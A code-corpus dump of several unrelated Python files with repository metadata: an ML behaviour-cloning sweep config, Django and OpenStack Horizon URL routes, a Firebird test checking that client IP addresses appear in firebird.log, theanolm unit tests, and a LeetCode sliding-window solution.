hidden_sizes=[256] * 4,
max_log_std=0,
min_log_std=-6,
),
path_loader_kwargs=dict(
demo_path='demos/hopper_action_noise_1000.npy',
),
)
search_space = {
'trainer_kwargs.use_automatic_entropy_tuning':[False],
'trainer_kwargs.bc_num_pretrain_steps':[400000],
'trainer_kwargs.bc_weight':[1],
'train_rl':[False],
'pretrain_policy':[True],
'pretrain_rl':[False],
'load_demos':[True],
'path_loader_kwargs.frac_trajs':[.002],
'env': [
'hopper',
],
'policy_class':[
GaussianPolicy,
],
}
sweeper = hyp.DeterministicHyperparameterSweeper(
search_space, default_parameters=variant,
)
n_seeds = 1
mode = 'local'
exp_prefix = 'bc_hopper_frac_trajs_sweep'
for exp_id, variant in enumerate(sweeper.iterate_hyperparameters()):
for _ in range(n_seeds):
run_experiment(
experiment,
exp_prefix=exp_prefix,
mode=mode,
variant=variant,
num_exps_per_instance=1,
use_gpu=True,
gcp_kwargs=dict(
preemptible=False,
),
skip_wait=True,
)
| true | true |
1c305a1689fab06136f359666ffcc90fcdfad923 | 218 | py | Python | pypro/videos/urls.py | rodrigoddc/django-advanced-course | 098507d8111f38f8a6b914575e50861538913f6c | [
"MIT"
] | 1 | 2020-06-30T01:30:31.000Z | 2020-06-30T01:30:31.000Z | pypro/videos/urls.py | rodrigoddc/django-advanced-course | 098507d8111f38f8a6b914575e50861538913f6c | [
"MIT"
] | 102 | 2020-06-30T01:03:27.000Z | 2021-09-22T19:26:44.000Z | pypro/videos/urls.py | rodrigoddc/django-advanced-course | 098507d8111f38f8a6b914575e50861538913f6c | [
"MIT"
] | null | null | null | from django.urls import path
from .views import video_render, video_list
# URL namespace: reverse these routes as 'videos:video_list' / 'videos:video_render'.
app_name = 'videos'
urlpatterns = [
    # Root of the app -> listing view.
    path('', video_list, name='video_list'),
    # One video selected by its slug.
    path('<slug:slug>/', video_render, name='video_render'),
]
| 24.222222 | 60 | 0.706422 | from django.urls import path
from .views import video_render, video_list
app_name = 'videos'
urlpatterns = [
path('', video_list, name='video_list'),
path('<slug:slug>/', video_render, name='video_render'),
]
| true | true |
1c305b37c58edcfc78fee46b861ad540bdec2eff | 14,296 | py | Python | tests/bugs/core_2493_test.py | reevespaul/firebird-qa | 98f16f425aa9ab8ee63b86172f959d63a2d76f21 | [
"MIT"
] | null | null | null | tests/bugs/core_2493_test.py | reevespaul/firebird-qa | 98f16f425aa9ab8ee63b86172f959d63a2d76f21 | [
"MIT"
] | null | null | null | tests/bugs/core_2493_test.py | reevespaul/firebird-qa | 98f16f425aa9ab8ee63b86172f959d63a2d76f21 | [
"MIT"
] | null | null | null | #coding:utf-8
#
# id: bugs.core_2493
# title: Append the IP address of the remote host to error messages in firebird.log for TCP connections
# decription:
# Following actions are performed by this test:
#
# 1. Obtain current firebird.log and saves it to the file with name = 'tmp_2493_fblog_before.txt';
#
# 2. Asynchronously launch ISQL in child process with request to return client IP address (via asking context variable)
# and after this - do some 'heavy query' that for sure will take a lot of time and resources.
# Output is redirected to file with name = 'tmp_2493_isql.log' and will be parsed further (we'll search for client IP there).
#
# 3. Kill launched ISQL process after several seconds. At this point new message must appear in firebird.log and it MUST
# be in format described in the ticket. Because this abend will be detected by SERVER, format of message will be like this:
# (for TCPv4): INET/inet_error: read errno = 10054, client host = prog1, address = 127.0.0.1/4076, user = john
# (for TCPv6): INET/inet_error: read errno = 10054, client host = prog2, address = fe80::c40e:21ec:b5c7:8963/56831, user = mick
#
# 4. Wait several seconds and after it - obtain again firebird.log (new content) and save it in 'tmp_2493_fblog_after.txt'.
#
# 5. Make file comparison by calling method from standard Python tool - difflib. Result of this comparison will be stored
# in file with name 'tmp_2493_diff.txt'. This file will have several lines from which we are interested only for one which
# STARTS with "+" (PLUS sign) and does contain phrase 'INET/INET_ERROR'. Diff-file must contain only ONE such line.
#
# 6. Next we parse this line: remove "/" and "="characters from it and split then text into array of words:
# + INET inet_error read errno 10054 client host prog1 address 127.0.0.1 4417 user john ------- for IPv4
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13
# + INET inet_error read errno 10054 client host prog2 address x::y:z:u:v 56831 user mick ------- for IPv6
# 7. Then we scan this array backward and check tokens for matching simple rules (N = array len):
# * token N-1 must be OS user name; this name can be followed by some kind of "suffix": "JOHN.-1.-1" - and we have to take only 1st word from it.
# NB: we current OS user using call of getpass.getuser(). It must be compared in case insensitive manner;
# * token N-2 is just word "user" (as is);
# * token N-3 is port number, it has to be positive value;
# * token N-4 is IP. It must be equal to rdb$get_context('SYSTEM','CLIENT_ADDRESS').
#
# This is how differences look in firebird.log:
# # 2.5.9:
# # INET/inet_error: read errno = 10054, client address = 127.0.0.1 3268, user ZOTOV.-1.-1
# # ^ ^ ^ ^
# # N-4 N-3 N-2 N-1
# # 3.0.4:
# # INET/inet_error: read errno = 10054, client host = csprog, address = 127.0.0.1 3298, user zotov
# # ^ ^ ^ ^
# # N-4 N-3 N-2 N-1
# # 3.0.8 and 4.0.0 RC1:
# # INET/inet_error: read errno = 10054, client host = csprog, address = fe80::fcf1:e33c:e924:969d%16/56887, user = zotov
# # INET/inet_error: read errno = 10054, client host = csprog, address = fe80::fcf1:e33c:e924:969d%16/56883, user = zotov
#
#
# Checked on WI-V3.0.0.32272 x86 and amd64, OS = Windows XP and 8.1, TCPv4 and TCPv6; fdb version = 1.5, Python 2.7 and 3.4.
# Checked 17.02.2018 after adding 2.5.9 to the list of avaliable versions:
# 2.5.9.27103: OK, 5.547s.
# 3.0.3.32837: OK, 7.079s.
# 3.0.4.32912: OK, 6.094s.
# 4.0.0.800: OK, 7.109s.
# 4.0.0.890: OK, 6.360s.
# ### NB ###
# First version of this test was implemented on Windows XP and Python 2.7.8, build 02-jul-2014 win32.
# Unfortunatelly, on Python 3.4 + Win 8.1 it is unable to use socket.inet_pton() call -exception raises with text:
# "AttributeError: 'module' object has no attribute 'inet_pton'".
# For that reason it was decided do NOT use calls of socket.inet_pton() and operate only with remote_address that can be easy
# received using built-in FB context variable. User-defined functions 'is_valid_ipv4' and 'is_valid_ipv6' are left here for
# possible further usage in some other tests.
#
# 20.02.2021: changed 'platform' attribute to Windows only. Content of firebird.log has no changes on Linux during this test run.
# Perhaps, this is temporary and another solution will be found/implemented. Sent letter to dimitr et al, 21.02.2021 08:20.
#
# tracker_id: CORE-2493
# min_versions: ['2.5.9']
# versions: 2.5.9
# qmid:
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 2.5.9
# resources: None
substitutions_1 = []
init_script_1 = """
recreate table log(ip varchar(255));
create sequence g;
commit;
"""
# Dialect-3 test database, initialised with the `log` table and sequence
# created by init_script_1 above.
db_1 = db_factory(sql_dialect=3, init=init_script_1)
# test_script_1
#---
# import os
# import time
# import subprocess
# from subprocess import Popen
# import signal
# import difflib
# import re
# import socket
# import getpass
#
# os.environ["ISC_USER"] = user_name
# os.environ["ISC_PASSWORD"] = user_password
#
# engine = str(db_conn.engine_version)
# db_conn.close()
#
# #-----------------------------------
#
# def flush_and_close(file_handle):
# # https://docs.python.org/2/library/os.html#os.fsync
# # If you're starting with a Python file object f,
# # first do f.flush(), and
# # then do os.fsync(f.fileno()), to ensure that all internal buffers associated with f are written to disk.
# global os
#
# file_handle.flush()
# os.fsync(file_handle.fileno())
#
# file_handle.close()
#
# #--------------------------------------------
#
# def cleanup( f_names_list ):
# global os
# for i in range(len( f_names_list )):
# if os.path.isfile( f_names_list[i]):
# os.remove( f_names_list[i] )
# if os.path.isfile( f_names_list[i]):
# print('ERROR: can not remove file ' + f_names_list[i])
#
# #-------------------------------------------
#
#
# def svc_get_fb_log( engine, f_fb_log ):
#
# import subprocess
#
# if engine.startswith('2.5'):
# get_firebird_log_key='action_get_ib_log'
# else:
# get_firebird_log_key='action_get_fb_log'
#
# subprocess.call([ context['fbsvcmgr_path'],
# "localhost:service_mgr",
# get_firebird_log_key
# ],
# stdout=f_fb_log,
# stderr=subprocess.STDOUT
# )
#
# return
#
# #--------------------------------------------
#
# # http://stackoverflow.com/questions/319279/how-to-validate-ip-address-in-python
# def is_valid_ipv4(address):
# import socket
# try:
# socket.inet_pton(socket.AF_INET, address)
# except AttributeError: # no inet_pton here, sorry
# try:
# socket.inet_aton(address)
# except socket.error:
# return False
# return address.count('.') == 3
# except socket.error: # not a valid address
# return False
#
# return True
#
# #--------------------------------------------
#
# def is_valid_ipv6(address):
# import socket
# try:
# socket.inet_pton(socket.AF_INET6, address)
# except socket.error: # not a valid address
# return False
# return True
#
# #--------------------------------------------
#
# f_fblog_before=open(os.path.join(context['temp_directory'],'tmp_2493_fblog_before.txt'), 'w')
#
# svc_get_fb_log( engine, f_fblog_before )
#
# f_fblog_before.close()
#
# isql_txt=''' insert into log(ip) values( rdb$get_context('SYSTEM','CLIENT_ADDRESS') );
# commit;
# select count(i) from (select gen_id(g,1) i from rdb$types a,rdb$types b,rdb$types c,rdb$types d);
# '''
#
# f_sql_txt=open( os.path.join(context['temp_directory'],'tmp_2493_isql.sql'), 'w')
# f_sql_txt.write(isql_txt)
# flush_and_close( f_sql_txt )
#
# f_sql_log=open(os.path.join(context['temp_directory'],'tmp_2493_isql.log'), 'w' )
# f_sql_err=open(os.path.join(context['temp_directory'],'tmp_2493_isql.err'), 'w' )
#
# p_isql=Popen( [ context['isql_path'], dsn, "-i", f_sql_txt.name ], stdout=f_sql_log, stderr=f_sql_err
# )
# time.sleep(3)
#
# p_isql.terminate()
#
# flush_and_close( f_sql_log )
# flush_and_close( f_sql_err )
#
# f_sql_txt=open(os.path.join(context['temp_directory'],'tmp_2493_isql.sql'), 'w')
# f_sql_txt.write("set heading off; select iif(gen_id(g,0) = 0, 'Trouble with subprocess: job was not started.', ip) as msg from log; quit;")
# flush_and_close( f_sql_txt )
#
# mon_ip=subprocess.check_output( [ context['isql_path'], dsn, '-i', f_sql_txt.name ]).split()[0]
#
# f_fblog_after=open(os.path.join(context['temp_directory'],'tmp_2493_fblog_after.txt'), 'w')
#
# svc_get_fb_log( engine, f_fblog_after )
#
# flush_and_close( f_fblog_after )
#
# oldfb=open(f_fblog_before.name, 'r')
# newfb=open(f_fblog_after.name, 'r')
#
# difftext = ''.join(difflib.unified_diff(
# oldfb.readlines(),
# newfb.readlines()
# ))
# oldfb.close()
# newfb.close()
#
# f_diff_txt=open( os.path.join(context['temp_directory'],'tmp_2493_diff.txt'), 'w')
# f_diff_txt.write(difftext)
# flush_and_close( f_diff_txt )
#
# inet_msg_words = []
# logged_err=0
# with open( f_diff_txt.name,'r') as f:
# for line in f:
# if line.startswith('+') and 'INET/INET_ERROR' in line.upper():
# # DO NOT include ':' to the list of delimiters! It is involved in IPv6 address:
# inet_msg_words = line.replace(',',' ').replace('/',' ').replace('=',' ').split()
# break
#
# # Tokens, numerated from zero (NB: leftmost is "PLUS" sign and has index = 0)
# # ---------------------------------------------------------------------------
# # + INET inet_error read errno 10054 client host prog1 address 127.0.0.1 4417 user john ------- for IPv4
# # 0 1 2 3 4 5 6 7 8 9 10 11 12 13
# # + INET inet_error read errno 10054 client host prog2 address x::y:z:u:v 56831 user mick ------- for IPv6
#
# # + INET/inet_error: read errno = 10054, client host = csprog, address = fe80::fcf1:e33c:e924:969d%16/56883, user = zotov
# # 0 1 2 3 4 5 6 7 8 9 10 11 12 --> len() = 13
#
# n = len(inet_msg_words)
#
# parsing_problem_msg = 'Problem with parsing content of firebird.log'
# if len(inet_msg_words) == 0:
# print('%s: message with "inet_error" not found.' % parsing_problem_msg)
# elif len(inet_msg_words) < 4:
# print('%s: message with "inet_error" contains less than 4 tokens.' % parsing_problem_msg)
# else:
#
# #print('Fixed data: '+inet_msg_words[4]+' '+inet_msg_words[5]+' '+inet_msg_words[6]+' '+inet_msg_words[7])
#
# # http://stackoverflow.com/questions/4271740/how-can-i-use-python-to-get-the-system-hostname
#
# # commented 17.02.2017 due to 2.5.9 (no info about remote host there):
# #if inet_msg_words[8].upper()==socket.gethostname().upper():
# # print('Remote host: valid, passed socket.gethostname()')
# #else:
# # print('Invalid host=|'+inet_msg_words[8]+'|')
#
# # does not work on Python 3.4! >>> if is_valid_ipv4(inet_msg_words[10]) or is_valid_ipv6(inet_msg_words[10]):
# if inet_msg_words[n-4] + '/' + inet_msg_words[n-3] == mon_ip:
# print("String IP/port: valid, equal to 'CLIENT_ADDRESS'")
# else:
# print('Invalid IP/port=|'+inet_msg_words[n-4]+'/'+inet_msg_words[n-3]+'| - differ from mon_ip=|'+mon_ip+'|')
#
# if inet_msg_words[n-3].isdigit():
# print('Port value: valid, positive integer.')
# else:
# print('Invalid port=|'+inet_msg_words[n-3]+'|')
#
# if inet_msg_words[n-1].upper().split('.')[0] == getpass.getuser().upper():
# # 2.5.9: got 'ZOTOV.-1.-1' ==> must be kust of one word: 'ZOTOV'
# print('OS user: valid, passed getpass.getuser()')
# else:
# print('Invalid OS user=|'+inet_msg_words[n-1]+'|')
#
#
# # Cleanup.
# ##########
# time.sleep(1)
# cleanup( [i.name for i in (f_sql_txt,f_sql_log,f_sql_err,f_fblog_before,f_fblog_after,f_diff_txt) ] )
#
#
#---
#act_1 = python_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """
String IP/port: valid, equal to 'CLIENT_ADDRESS'
Port value: valid, positive integer.
OS user: valid, passed getpass.getuser()
"""
# The actual driver code for this check still lives only in the commented-out
# test_script_1 above; until it is ported, this test fails unconditionally and
# is marked xfail.  Windows-only: per the header notes, firebird.log does not
# change on Linux during this scenario.
@pytest.mark.version('>=2.5.9')
@pytest.mark.platform('Windows')
@pytest.mark.xfail
def test_1(db_1):
    """Placeholder for CORE-2493 (client IP in firebird.log error messages)."""
    pytest.fail("Test not IMPLEMENTED")
| 45.674121 | 165 | 0.55617 |
#
# 3. Kill launched ISQL process after several seconds. At this point new message must appear in firebird.log and it MUST
# be in format described in the ticket. Because this abend will be detected by SERVER, format of message will be like this:
# (for TCPv4): INET/inet_error: read errno = 10054, client host = prog1, address = 127.0.0.1/4076, user = john
# (for TCPv6): INET/inet_error: read errno = 10054, client host = prog2, address = fe80::c40e:21ec:b5c7:8963/56831, user = mick
#
# 4. Wait several seconds and after it - obtain again firebird.log (new content) and save it in 'tmp_2493_fblog_after.txt'.
#
# 5. Make file comparison by calling method from standard Python tool - difflib. Result of this comparison will be stored
# in file with name 'tmp_2493_diff.txt'. This file will have several lines from which we are interested only for one which
# STARTS with "+" (PLUS sign) and does contain phrase 'INET/INET_ERROR'. Diff-file must contain only ONE such line.
#
# 6. Next we parse this line: remove "/" and "="characters from it and split then text into array of words:
# + INET inet_error read errno 10054 client host prog1 address 127.0.0.1 4417 user john ------- for IPv4
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13
# + INET inet_error read errno 10054 client host prog2 address x::y:z:u:v 56831 user mick ------- for IPv6
# 7. Then we scan this array backward and check tokens for matching simple rules (N = array len):
# * token N-1 must be OS user name; this name can be followed by some kind of "suffix": "JOHN.-1.-1" - and we have to take only 1st word from it.
# NB: we current OS user using call of getpass.getuser(). It must be compared in case insensitive manner;
# * token N-2 is just word "user" (as is);
# * token N-3 is port number, it has to be positive value;
# * token N-4 is IP. It must be equal to rdb$get_context('SYSTEM','CLIENT_ADDRESS').
#
# This is how differences look in firebird.log:
# # 2.5.9:
# # INET/inet_error: read errno = 10054, client address = 127.0.0.1 3268, user ZOTOV.-1.-1
# # ^ ^ ^ ^
# # N-4 N-3 N-2 N-1
# # 3.0.4:
# # INET/inet_error: read errno = 10054, client host = csprog, address = 127.0.0.1 3298, user zotov
# # ^ ^ ^ ^
# # N-4 N-3 N-2 N-1
# # 3.0.8 and 4.0.0 RC1:
# # INET/inet_error: read errno = 10054, client host = csprog, address = fe80::fcf1:e33c:e924:969d%16/56887, user = zotov
# # INET/inet_error: read errno = 10054, client host = csprog, address = fe80::fcf1:e33c:e924:969d%16/56883, user = zotov
#
#
# Checked on WI-V3.0.0.32272 x86 and amd64, OS = Windows XP and 8.1, TCPv4 and TCPv6; fdb version = 1.5, Python 2.7 and 3.4.
# Checked 17.02.2018 after adding 2.5.9 to the list of avaliable versions:
# 2.5.9.27103: OK, 5.547s.
# 3.0.3.32837: OK, 7.079s.
# 3.0.4.32912: OK, 6.094s.
# 4.0.0.800: OK, 7.109s.
# 4.0.0.890: OK, 6.360s.
# ### NB ###
# First version of this test was implemented on Windows XP and Python 2.7.8, build 02-jul-2014 win32.
# Unfortunatelly, on Python 3.4 + Win 8.1 it is unable to use socket.inet_pton() call -exception raises with text:
# "AttributeError: 'module' object has no attribute 'inet_pton'".
# For that reason it was decided do NOT use calls of socket.inet_pton() and operate only with remote_address that can be easy
# received using built-in FB context variable. User-defined functions 'is_valid_ipv4' and 'is_valid_ipv6' are left here for
# possible further usage in some other tests.
#
# 20.02.2021: changed 'platform' attribute to Windows only. Content of firebird.log has no changes on Linux during this test run.
# Perhaps, this is temporary and another solution will be found/implemented. Sent letter to dimitr et al, 21.02.2021 08:20.
#
# tracker_id: CORE-2493
# min_versions: ['2.5.9']
# versions: 2.5.9
# qmid:
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 2.5.9
# resources: None
substitutions_1 = []
init_script_1 = """
recreate table log(ip varchar(255));
create sequence g;
commit;
"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
# test_script_1
#---
# import os
# import time
# import subprocess
# from subprocess import Popen
# import signal
# import difflib
# import re
# import socket
# import getpass
#
# os.environ["ISC_USER"] = user_name
# os.environ["ISC_PASSWORD"] = user_password
#
# engine = str(db_conn.engine_version)
# db_conn.close()
#
# #-----------------------------------
#
# def flush_and_close(file_handle):
# # https://docs.python.org/2/library/os.html#os.fsync
# # If you're starting with a Python file object f,
| true | true |
1c305c2d921ec67d21b2635b4f22173edf4c7a40 | 3,409 | py | Python | tests/theanolm/recurrentstate_test.py | vasuneralla/theanolm | 51fbd89082ca3ea5d0178d09b744cf15c0113ab6 | [
"Apache-2.0"
] | 95 | 2016-01-16T16:18:13.000Z | 2022-01-25T16:31:29.000Z | tests/theanolm/recurrentstate_test.py | nd1511/theanolm | 9eda655ed63e8906234e62ab7da016e64e931afe | [
"Apache-2.0"
] | 43 | 2015-10-16T08:49:26.000Z | 2020-10-12T07:17:04.000Z | tests/theanolm/recurrentstate_test.py | nd1511/theanolm | 9eda655ed63e8906234e62ab7da016e64e931afe | [
"Apache-2.0"
] | 37 | 2016-03-25T23:21:54.000Z | 2020-11-05T11:21:58.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import unittest
import math
import numpy
from numpy.testing import assert_equal
from theanolm.network import RecurrentState
class TestRecurrentState(unittest.TestCase):
    """Unit tests for theanolm.network.RecurrentState."""
    def setUp(self):
        pass
    def tearDown(self):
        pass
    def test_init(self):
        # Without explicit initial data, every layer state starts as an
        # all-zero array of shape (1, num_sequences, layer_size).
        state = RecurrentState([200, 100, 300], 3)
        self.assertEqual(len(state.get()), 3)
        self.assertEqual(state.get(0).shape, (1,3,200))
        self.assertEqual(state.get(1).shape, (1,3,100))
        self.assertEqual(state.get(2).shape, (1,3,300))
        assert_equal(state.get(0), numpy.zeros(shape=(1,3,200), dtype='int64'))
        assert_equal(state.get(1), numpy.zeros(shape=(1,3,100), dtype='int64'))
        assert_equal(state.get(2), numpy.zeros(shape=(1,3,300), dtype='int64'))
        # Initial values passed to the constructor are stored as given.
        layer1_state = numpy.arange(15, dtype='int64').reshape((1, 3, 5))
        layer2_state = numpy.arange(30, dtype='int64').reshape((1, 3, 10))
        state = RecurrentState([5, 10], 3, [layer1_state, layer2_state])
        assert_equal(state.get(0), layer1_state)
        assert_equal(state.get(1), layer2_state)
    def test_set(self):
        # set() replaces the per-layer state arrays in order.
        state = RecurrentState([5, 10], 3)
        layer1_state = numpy.arange(15, dtype='int64').reshape((1, 3, 5))
        layer2_state = numpy.arange(30, dtype='int64').reshape((1, 3, 10))
        state.set([layer1_state, layer2_state])
        assert_equal(state.get(0), layer1_state)
        assert_equal(state.get(1), layer2_state)
        # Arrays that don't match the declared layer sizes (the two layers
        # are swapped here) must be rejected.
        with self.assertRaises(ValueError):
            state.set([layer2_state, layer1_state])
    def test_combine_sequences(self):
        # Three states holding 1 + 1 + 2 sequences with matching layer sizes.
        state1 = RecurrentState([5, 10], 1)
        layer1_state = numpy.arange(5, dtype='int64').reshape(1, 1, 5)
        layer2_state = numpy.arange(10, 20, dtype='int64').reshape(1, 1, 10)
        state1.set([layer1_state, layer2_state])
        state2 = RecurrentState([5, 10], 1)
        layer1_state = numpy.arange(100, 105, dtype='int64').reshape(1, 1, 5)
        layer2_state = numpy.arange(110, 120, dtype='int64').reshape(1, 1, 10)
        state2.set([layer1_state, layer2_state])
        state3 = RecurrentState([5, 10], 2)
        layer1_state = numpy.arange(200, 210, dtype='int64').reshape(1, 2, 5)
        layer2_state = numpy.arange(210, 230, dtype='int64').reshape(1, 2, 10)
        state3.set([layer1_state, layer2_state])
        # Combining concatenates the states along the sequence axis,
        # preserving input order: 1 + 1 + 2 -> 4 sequences.
        combined_state = RecurrentState.combine_sequences([state1, state2, state3])
        self.assertEqual(combined_state.num_sequences, 4)
        self.assertEqual(len(combined_state.get()), 2)
        self.assertEqual(combined_state.get(0).shape, (1,4,5))
        self.assertEqual(combined_state.get(1).shape, (1,4,10))
        assert_equal(combined_state.get(0), numpy.asarray(
            [[list(range(5)),
              list(range(100, 105)),
              list(range(200, 205)),
              list(range(205, 210))]],
            dtype='int64'))
        assert_equal(combined_state.get(1), numpy.asarray(
            [[list(range(10, 20)),
              list(range(110, 120)),
              list(range(210, 220)),
              list(range(220, 230))]],
            dtype='int64'))
        # Mismatched layer sizes (11 vs 10) must make combining fail.
        state4 = RecurrentState([5, 11], 2)
        with self.assertRaises(ValueError):
            combined_state = RecurrentState.combine_sequences([state1, state2, state3, state4])
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
| 39.639535 | 95 | 0.61983 |
import unittest
import math
import numpy
from numpy.testing import assert_equal
from theanolm.network import RecurrentState
class TestRecurrentState(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_init(self):
state = RecurrentState([200, 100, 300], 3)
self.assertEqual(len(state.get()), 3)
self.assertEqual(state.get(0).shape, (1,3,200))
self.assertEqual(state.get(1).shape, (1,3,100))
self.assertEqual(state.get(2).shape, (1,3,300))
assert_equal(state.get(0), numpy.zeros(shape=(1,3,200), dtype='int64'))
assert_equal(state.get(1), numpy.zeros(shape=(1,3,100), dtype='int64'))
assert_equal(state.get(2), numpy.zeros(shape=(1,3,300), dtype='int64'))
layer1_state = numpy.arange(15, dtype='int64').reshape((1, 3, 5))
layer2_state = numpy.arange(30, dtype='int64').reshape((1, 3, 10))
state = RecurrentState([5, 10], 3, [layer1_state, layer2_state])
assert_equal(state.get(0), layer1_state)
assert_equal(state.get(1), layer2_state)
def test_set(self):
state = RecurrentState([5, 10], 3)
layer1_state = numpy.arange(15, dtype='int64').reshape((1, 3, 5))
layer2_state = numpy.arange(30, dtype='int64').reshape((1, 3, 10))
state.set([layer1_state, layer2_state])
assert_equal(state.get(0), layer1_state)
assert_equal(state.get(1), layer2_state)
with self.assertRaises(ValueError):
state.set([layer2_state, layer1_state])
def test_combine_sequences(self):
state1 = RecurrentState([5, 10], 1)
layer1_state = numpy.arange(5, dtype='int64').reshape(1, 1, 5)
layer2_state = numpy.arange(10, 20, dtype='int64').reshape(1, 1, 10)
state1.set([layer1_state, layer2_state])
state2 = RecurrentState([5, 10], 1)
layer1_state = numpy.arange(100, 105, dtype='int64').reshape(1, 1, 5)
layer2_state = numpy.arange(110, 120, dtype='int64').reshape(1, 1, 10)
state2.set([layer1_state, layer2_state])
state3 = RecurrentState([5, 10], 2)
layer1_state = numpy.arange(200, 210, dtype='int64').reshape(1, 2, 5)
layer2_state = numpy.arange(210, 230, dtype='int64').reshape(1, 2, 10)
state3.set([layer1_state, layer2_state])
combined_state = RecurrentState.combine_sequences([state1, state2, state3])
self.assertEqual(combined_state.num_sequences, 4)
self.assertEqual(len(combined_state.get()), 2)
self.assertEqual(combined_state.get(0).shape, (1,4,5))
self.assertEqual(combined_state.get(1).shape, (1,4,10))
assert_equal(combined_state.get(0), numpy.asarray(
[[list(range(5)),
list(range(100, 105)),
list(range(200, 205)),
list(range(205, 210))]],
dtype='int64'))
assert_equal(combined_state.get(1), numpy.asarray(
[[list(range(10, 20)),
list(range(110, 120)),
list(range(210, 220)),
list(range(220, 230))]],
dtype='int64'))
state4 = RecurrentState([5, 11], 2)
with self.assertRaises(ValueError):
combined_state = RecurrentState.combine_sequences([state1, state2, state3, state4])
if __name__ == '__main__':
unittest.main()
| true | true |
1c305cc64a034db53b5866f7d0d85806c73acbfd | 1,700 | py | Python | app/portal/horizon/openstack_dashboard/dashboards/identity/users/urls.py | haoshen61/f5-adcaas-openstack | 4bda29271930bf7c621f4184bda8d43b2fa96336 | [
"Apache-2.0"
] | 37 | 2018-10-30T02:47:24.000Z | 2021-12-04T10:29:40.000Z | openstack_dashboard/dashboards/identity/users/urls.py | nyzsirt/horizon | 53dd2dbd39c50b665ebe2d2a877496169f01a13f | [
"Apache-2.0"
] | 106 | 2019-01-18T03:06:55.000Z | 2019-11-29T05:06:18.000Z | openstack_dashboard/dashboards/identity/users/urls.py | nyzsirt/horizon | 53dd2dbd39c50b665ebe2d2a877496169f01a13f | [
"Apache-2.0"
] | 35 | 2018-11-26T03:36:31.000Z | 2021-12-04T10:29:41.000Z | # Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.conf import settings
from django.conf.urls import url
from django.utils.translation import ugettext_lazy as _
from horizon.browsers.views import AngularIndexView
from openstack_dashboard.dashboards.identity.users import views
# The ANGULAR_FEATURES setting toggles the experimental AngularJS users panel.
if settings.ANGULAR_FEATURES.get('users_panel', False):
    title = _("Users")
    # Angular panel: only the index route is registered; the per-user actions
    # are presumably handled client-side by the Angular app -- confirm.
    urlpatterns = [
        url(r'^$', AngularIndexView.as_view(title=title), name='index'),
    ]
else:
    # Legacy Django views: one route per user action, keyed by user_id.
    urlpatterns = [
        url(r'^$', views.IndexView.as_view(), name='index'),
        url(r'^(?P<user_id>[^/]+)/update/$',
            views.UpdateView.as_view(), name='update'),
        url(r'^create/$', views.CreateView.as_view(), name='create'),
        url(r'^(?P<user_id>[^/]+)/detail/$',
            views.DetailView.as_view(), name='detail'),
        url(r'^(?P<user_id>[^/]+)/change_password/$',
            views.ChangePasswordView.as_view(), name='change_password'),
    ]
| 37.777778 | 78 | 0.687059 |
from django.conf import settings
from django.conf.urls import url
from django.utils.translation import ugettext_lazy as _
from horizon.browsers.views import AngularIndexView
from openstack_dashboard.dashboards.identity.users import views
if settings.ANGULAR_FEATURES.get('users_panel', False):
title = _("Users")
urlpatterns = [
url(r'^$', AngularIndexView.as_view(title=title), name='index'),
]
else:
urlpatterns = [
url(r'^$', views.IndexView.as_view(), name='index'),
url(r'^(?P<user_id>[^/]+)/update/$',
views.UpdateView.as_view(), name='update'),
url(r'^create/$', views.CreateView.as_view(), name='create'),
url(r'^(?P<user_id>[^/]+)/detail/$',
views.DetailView.as_view(), name='detail'),
url(r'^(?P<user_id>[^/]+)/change_password/$',
views.ChangePasswordView.as_view(), name='change_password'),
]
| true | true |
1c305d425e27330d2aa3609c94420ecd795e84a1 | 881 | py | Python | LeetCode/2019-01-22-209-Minimum-Size-Subarray-Sum.py | HeRuivio/-Algorithm | 1fbe6256630758fda3af68f469471ee246730afc | [
"MIT"
] | 5 | 2018-10-30T05:07:32.000Z | 2019-06-18T08:11:38.000Z | LeetCode/2019-01-22-209-Minimum-Size-Subarray-Sum.py | HeRuivio/-Algorithm | 1fbe6256630758fda3af68f469471ee246730afc | [
"MIT"
] | 1 | 2020-05-09T09:05:16.000Z | 2020-05-09T09:05:16.000Z | LeetCode/2019-01-22-209-Minimum-Size-Subarray-Sum.py | HeRuivio/-Algorithm | 1fbe6256630758fda3af68f469471ee246730afc | [
"MIT"
] | 2 | 2020-05-09T09:02:22.000Z | 2020-12-09T13:23:00.000Z | # -*- coding: utf-8 -*-
# @Author: 何睿
# @Create Date: 2019-01-22 11:37:16
# @Last Modified by: 何睿
# @Last Modified time: 2019-01-22 11:37:16
import sys
class Solution:
    def minSubArrayLen(self, s, nums):
        """Return the length of the shortest contiguous subarray of *nums*
        whose sum is >= *s*, or 0 if no such subarray exists.

        Sliding-window scan, O(len(nums)) time: grow the window on the
        right and, whenever the running sum reaches *s*, shrink it from
        the left as far as possible before recording the window length.

        :type s: int
        :type nums: List[int]
        :rtype: int
        """
        best = sys.maxsize
        window_sum = 0
        lo = 0
        for hi, value in enumerate(nums):
            window_sum += value
            if window_sum < s:
                continue
            # Drop elements from the left while the remaining sum still
            # covers s; afterwards lo sits one past the last one removed.
            while lo <= hi and window_sum >= s:
                window_sum -= nums[lo]
                lo += 1
            # The shortest qualifying window ending at hi is [lo - 1, hi],
            # i.e. hi - lo + 2 elements long.
            best = min(best, hi - lo + 2)
        return 0 if best == sys.maxsize else best
| 26.69697 | 54 | 0.466515 |
import sys
class Solution:
def minSubArrayLen(self, s, nums):
length = sys.maxsize
_sum, left, right = 0, 0, 0
while right < len(nums):
_sum += nums[right]
if _sum >= s:
while _sum >= s and left <= right:
_sum -= nums[left]
left += 1
length = min(right - left + 2, length)
